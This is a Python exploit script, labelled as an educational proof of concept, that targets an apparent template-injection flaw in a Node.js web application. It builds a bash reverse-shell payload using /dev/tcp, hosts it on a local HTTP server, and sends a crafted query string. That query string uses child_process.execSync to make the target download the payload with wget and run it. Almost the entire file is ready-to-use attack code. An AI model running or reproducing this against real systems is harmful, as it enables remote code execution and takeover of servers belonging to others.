#!/usr/bin/env python3
# DISCLAIMER:
# This script is a Proof of Concept (PoC) for educational purposes only.
# Do not use it for illegal activities. The author is not responsible for any misuse.

import argparse
import os
import socket
import threading
import time
from http.server import HTTPServer, SimpleHTTPRequestHandler
import urllib.parse

GREEN = "\033[92m"
RED = "\033[91m"
RESET = "\033[0m"

def create_payload(lhost, lport):
    payload = f"""#!/bin/bash
bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
"""
    with open("payload.sh", "w") as f:
        f.write(payload)
    os.chmod("payload.sh", 0o755)
    print(f"{GREEN}[+] Payload created at payload.sh{RESET}")

def start_http_server():
    server_address = ("", 80)
    httpd = HTTPServer(server_address, SimpleHTTPRequestHandler)
    thread = threading.Thread(target=httpd.serve_forever, daemon=True)
    thread.start()
    print(f"{GREEN}[*] Hosting HTTP server on port 80{RESET}")
    return httpd

def trigger_remote(rhost, rport, lhost, lport):
    print(f"{GREEN}[*] Triggering remote execution{RESET}")
    cmd = f"wget http://{lhost}/payload.sh -O /tmp/payload.sh && bash /tmp/payload.sh"
    encoded_cmd = urllib.parse.quote(cmd)
    url = f"http://{rhost}:{rport}/?useWith=1&varName=%7B%20a%3A%20b%20%3D%20global.process.mainModule.require%28%27child_process%27%29.execSync%28%27{encoded_cmd}%27%29%20%7D"
    try:
        import requests
        requests.get(url, timeout=5)
    except Exception:
        # suppress all exceptions silently to keep output clean
        pass

def main():
    parser = argparse.ArgumentParser(description="PoC exploit script")
    parser.add_argument("-rhost", required=True, help="Target IP")
    parser.add_argument("-rport", type=int, required=True, help="Target port")
    parser.add_argument("-lhost", required=True, help="Local IP (HTTP server and listener)")
    parser.add_argument("-lport", type=int, required=True, help="Local port (listener for reverse shell)")
    args = parser.parse_args()

    create_payload(args.lhost, args.lport)
    http_server = start_http_server()

    trigger_remote(args.rhost, args.rport, args.lhost, args.lport)

    # timer for wget to request payload
    time.sleep(3)

    print(f"{GREEN}[*] Shutting down HTTP server on port 80{RESET}")
    http_server.shutdown()
    print(f"{RED}[!] Check your listener!{RESET}")

if __name__ == "__main__":
    main()